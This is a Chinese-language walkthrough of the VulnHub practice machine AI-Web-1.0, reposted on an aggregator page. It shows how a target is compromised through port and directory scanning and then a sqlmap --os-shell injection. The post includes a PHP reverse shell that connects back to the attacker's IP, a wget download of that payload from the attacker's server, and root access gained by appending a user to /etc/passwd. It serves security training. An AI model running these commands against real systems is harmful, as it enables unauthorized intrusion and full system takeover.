vulnhub靶机AI-Web-1.0

这篇具有很好参考价值的文章主要介绍了vulnhub靶机AI-Web-1.0。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

靶机信息

主机信息

网站信息

SQL注入

权限提升

flag

靶机信息

靶机界面

vulnhub靶机AI-Web-1.0,服务器,linux,网络

确认攻击机和靶机在同一网段

vulnhub靶机AI-Web-1.0,服务器,linux,网络

主机信息

查看下当前网段存活的主机

sudo arp-scan -l 

vulnhub靶机AI-Web-1.0,服务器,linux,网络

靶机的ip地址为10.4.7.145

扫下ip开放的端口

sudo nmap -A -p- -sS -sC -T4 10.4.7.145

vulnhub靶机AI-Web-1.0,服务器,linux,网络

这边就开放了一个80 端口是一个Apache httpd

网站信息

访问下网页

vulnhub靶机AI-Web-1.0,服务器,linux,网络

这个大概意思就是 连谷歌都搜不到我的信息

源码里也没什么有用的信息

vulnhub靶机AI-Web-1.0,服务器,linux,网络

扫下他网页的目录信息

dirb http://10.4.7.145  

vulnhub靶机AI-Web-1.0,服务器,linux,网络

扫出来3个文件index.html、robots.txt、server-status,都去访问一下

10.4.7.145/index.html

vulnhub靶机AI-Web-1.0,服务器,linux,网络

10.4.7.145/robots.txt

vulnhub靶机AI-Web-1.0,服务器,linux,网络

访问robots.txt文件,里面发现有两个目录,这个文件大概的意思就是不允许爬取这两个文件。

(此地无银三百两,我就得看看)

10.4.7.145/m3diNf0

vulnhub靶机AI-Web-1.0,服务器,linux,网络

10.4.7.145/se3reTdir777/uploads

vulnhub靶机AI-Web-1.0,服务器,linux,网络

网页上发现的目录都没有权限访问

接着访问下扫出来的最后一个目录

10.4.7.145/server-status

vulnhub靶机AI-Web-1.0,服务器,linux,网络

还是没有权限

接着扫下网页里发现目录

dirb http:10.4.7.145/m3diNf0

vulnhub靶机AI-Web-1.0,服务器,linux,网络

发现这个目录里有info.php文件,访问看看

(info.php里面就是服务器上的PHP配置信息,这个页面会列出PHP版本、服务器操作系统、PHP配置参数等信息)

10.4.7.145/m3diNf0/info.php

vulnhub靶机AI-Web-1.0,服务器,linux,网络

里面没有什么有用信息,但是看到了这个文件的路径信息

这次扫下se3reTdir777

dirb http://10.4.7.145/se3reTdir777

vulnhub靶机AI-Web-1.0,服务器,linux,网络

这边有个index.php文件,(这是个网站的默认首页文件)访问一下

http://10.4.7.145/se3reTdir777/index.php

vulnhub靶机AI-Web-1.0,服务器,linux,网络

这边显示有个输入框,可能会有sql注入漏洞

SQL注入

上msfconsle

sqlmap -u "http://10.4.7.145/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell

用msf意味着攻击者可以获得对目标系统的更高级别的访问权限,并且可以执行各种操作

sqlmap:用于检测和利用 Web 应用程序中的 SQL 注入漏洞。它能够自动化地检测、识别和利用多种类型的 SQL 注入漏洞,从而获取目标数据库中的敏感信息

--os-shell:选项会利用数据库服务器上的SQL注入漏洞,获取操作系统级别的命令行访问权限

vulnhub靶机AI-Web-1.0,服务器,linux,网络

vulnhub靶机AI-Web-1.0,服务器,linux,网络

第一个问题是web服务器支持那种web应用程序语言

第四个php

第二个问题是你想用什么作为可写目录

第二个自定义位置

下面就是要选择文件路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

(根据前面找到的info.php文件暴露的信息,绝对路径选择:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/)

这样就进入靶机系统os-shell命令行了(通过Shell,用户可以管理文件、运行程序、配置系统等操作。)

vulnhub靶机AI-Web-1.0,服务器,linux,网络

在kali里写一个php远程shell,ip是kali的ip

<?php
$sock=fsockopen("10.4.7.130",8848);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

vulnhub靶机AI-Web-1.0,服务器,linux,网络

在创建的php文件里打开终端,开启一个简单的http服务

vulnhub靶机AI-Web-1.0,服务器,linux,网络

访问下网页看看文件是否上传成功

vulnhub靶机AI-Web-1.0,服务器,linux,网络

回到靶机shell窗口将文件下载下来

wget -S http://10.4.7.130:8848/niuma.php
 

可能会出现好几次异常,多下几次就可以下载了!

权限提升

关闭http服务

在kali里再打开一个终端,设置监听端口为8848

nc -lnvp 8848

然后靶机执行刚下载的niuma文件

php niuma.php

vulnhub靶机AI-Web-1.0,服务器,linux,网络

看看监听到没

vulnhub靶机AI-Web-1.0,服务器,linux,网络

用python交互式可以看到用户的同时也能看到文件路径

python -c 'import pty;pty.spawn("/bin/bash")'

vulnhub靶机AI-Web-1.0,服务器,linux,网络

当前用户不是root,但有/etc/password文件的写入权限

尝试添加一个用户登录,因为写入的时候密码是加密的,所以要先加密密码

openssl passwd -1 -salt web1 123456

vulnhub靶机AI-Web-1.0,服务器,linux,网络

再写入密码

echo 'web1:$1$web1$ZrYgDZgZpLlsnVlxUaZwh/:0:0::/root:/bin/bash'>>/etc/passwd

vulnhub靶机AI-Web-1.0,服务器,linux,网络

切换创建的web1用户,已经是root权限了

vulnhub靶机AI-Web-1.0,服务器,linux,网络

vulnhub靶机AI-Web-1.0,服务器,linux,网络

flag

vulnhub靶机AI-Web-1.0,服务器,linux,网络文章来源地址https://www.toymoban.com/news/detail-840602.html

到了这里,关于vulnhub靶机AI-Web-1.0的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Spring Security 6.x 系列【28】授权服务器篇之Spring Authorization Server 1.0 入门案例

    有道无术,术尚可求,有术无道,止于术。 本系列Spring Boot 版本 3.0.4 本系列Spring Security 版本 6.0.2 本系列Spring Authorization Server 版本 1.0.2 源码地址:https://gitee.com/pearl-organization/study-spring-security-demo 在前几篇文档中,我们学习了 OAuth 2.0 协议,并使用 spring-security-oauth2-client 完成

    2024年02月12日
    浏览(40)
  • 锐捷RSR系列路由器——VPN功能——L2TP_VPDN1.0——L2TP 服务器典型配置

    目录 01  L2TP 强制隧道模式——用户本地认证 02  L2TP 强制隧道模式——AAA本地认证 03  VPDN 1.0域剥离认证——本地认证 04  VPDN 1.0域剥离认证——AAA认证 功能介绍 L2TP强制隧道模式: 在强制隧道模式下,LAC端终结来自远程接入客户的呼叫,然后通过中间网络以隧道方式将PPP会

    2024年02月04日
    浏览(57)
  • 搭建web服务器和NFS服务器

    网站需求: 1.基于域名www.openlab.com可以访问网站内容为 welcome to openlab!!! 2.给该公司创建三个子界面分别显示学生信息,教学资料和缴费网站,基于www.openlab.com/student/ 网站访问学生信息,www.openlab.com/data/网站访问教学资料www.openlab.com/money/网站访问缴费网站。 3.要求 (1)学生

    2024年01月23日
    浏览(52)
  • 【Vulnhub】搭建Vulnhub靶机

    Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 去vulnhub的官网 https://www.vulnhub.com可以看到各种镜像。 点击某一个进入我们可以看到关于镜像的详细信息,包括:镜像描述、难度等级、下载地址等。 通过下载地址下载完成

    2024年02月05日
    浏览(48)
  • Web入门-Web服务器

    Web服务器是一个程序软件, 对HTTP协议的操作进行封装 ,使得程序员不必直接对程序进行操作,让Web开发更加便捷, 简化web程序开发 。主要功能是“通过网上信息浏览服务”。 概念:Tomcat是阿Apache软件基金会一个核心项目,是一个开源免费轻量级的web服务器,支持Servlet/J

    2024年02月13日
    浏览(56)
  • 华纳云:web服务器和www服务器有什么区别?

    在这个数字化时代,互联网已经成为我们生活、学习和工作不可或缺的一部分。每天,我们都会通过各种设备访问无数的网页和网站,而这些网页和网站的背后,就是web服务器和www服务器。虽然这两种服务器在功能上有所相似,但它们之间还是存在着明显的区别。今天,就让

    2024年01月23日
    浏览(50)
  • 如何在虚拟专用服务器上配置 Nginx Web 服务器

    本文档涵盖的是不再受支持的 Ubuntu 版本。如果您目前正在运行 Ubuntu 12.04 服务器,我们强烈建议升级或迁移到受支持的 Ubuntu 版本: 升级到 Ubuntu 14.04 从 Ubuntu 14.04 升级到 Ubuntu 16.04 将服务器数据迁移到受支持的版本 原因: Ubuntu 12.04 已于 2017 年 4 月 28 日到达生命周期终点(

    2024年04月27日
    浏览(41)
  • 为一台计算机配置Web服务器,DNS服务器与DHCP服务器

    实验目的:为一台计算机配置Web服务器,DNS服务器与DHCP服务器 事先准备:三台纯净虚拟机(以下简称为虚拟机A,虚拟机B,虚拟机C)和一台主机 一、配置静态IP 因为要保证实验畅通,所以必须把四台机器配置成同一网段,使用同一网卡 1、首先保证三台虚拟机的网络适配器

    2024年02月11日
    浏览(54)
  • 搭建web服务器

    1.要求搭建web服务器,能够访问到网页内容为“小胖,你咋这么胖呢!” 2.要求搭建web服务器,创建基于域名的虚拟主机,能够使用www.xiaopang.com和www.dapang.com访问各自的网站网站存放路径分别为/xiaopang和/dapang,内容自定。 配置yun源:  安装软件包 添加成功后重启服务端:

    2024年02月09日
    浏览(51)
  • Web服务器

    目录 什么是Web服务器? Web容器 Servlet Servlet 规范 Servlet 的API结构 编写Servlet servlet生命周期(产生到销毁的过程) 服务器产生响应信息的两种格式         Web服务器是一个程序,用于接收客户端的请求并将响应发送回客户端。它通常用于处理静态内容,例如HTML文件、图像

    2024年02月03日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包